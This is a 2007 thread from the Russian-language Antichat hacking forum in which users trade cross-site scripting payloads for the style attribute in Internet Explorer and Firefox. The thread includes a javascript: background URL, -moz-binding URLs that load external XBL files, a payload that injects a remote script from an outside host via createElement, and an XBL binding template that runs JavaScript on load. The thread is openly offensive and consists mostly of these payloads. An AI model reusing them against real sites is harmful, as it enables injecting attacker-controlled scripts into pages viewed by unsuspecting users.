Форум АНТИЧАТ - XSS через style в Mozilla FireFox.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - XSS через style в Mozilla FireFox. (https://forum.antichat.xyz/showthread.php?t=54557)

Loopy

27.11.2007 16:56

XSS через style в Mozilla FireFox.

Хай.
По сабжу не подскажите?
В IE: style="background: url(javascript:alert());", а в Мозилле, слышал про -mozilla-opacity, или как-то так..
Нужно, чтобы в Мозилле при загрузке страницы сразу исполнялась XSS в аттрибуте style..

Евгений Минаев

27.11.2007 16:59

Попробуй так

Цитата:

<a href="#" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);

Loopy

27.11.2007 17:06

Евгений Минаев
Посмотрел этот XML, не, это жесткий метод.. сложно свободно писать Js.. Я хочю через аттрибут в стайле выполнить XSS подключающий сторонний Js-код, путём createElement..

Loopy

27.11.2007 17:15

Быть точнее.
style="background: url(javascript: document.createElement('script').src='http://www.mysite.ru/myscript.js');"
Это идеально для IE, тоже самое мне нужно в Мозилле, т.к. этот код не валиден Фоксу.

Loopy

27.11.2007 17:41

Подключил... Через биндинг..

CSS: -moz-binding: url("http://localhost/xml.xml#xss");
XML: <?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
JavaScript code...
</constructor>
</implementation>
</binding>
</bindings>

+toxa+

27.11.2007 22:44

http://ha.ckers.org/xss.html

Время: 03:52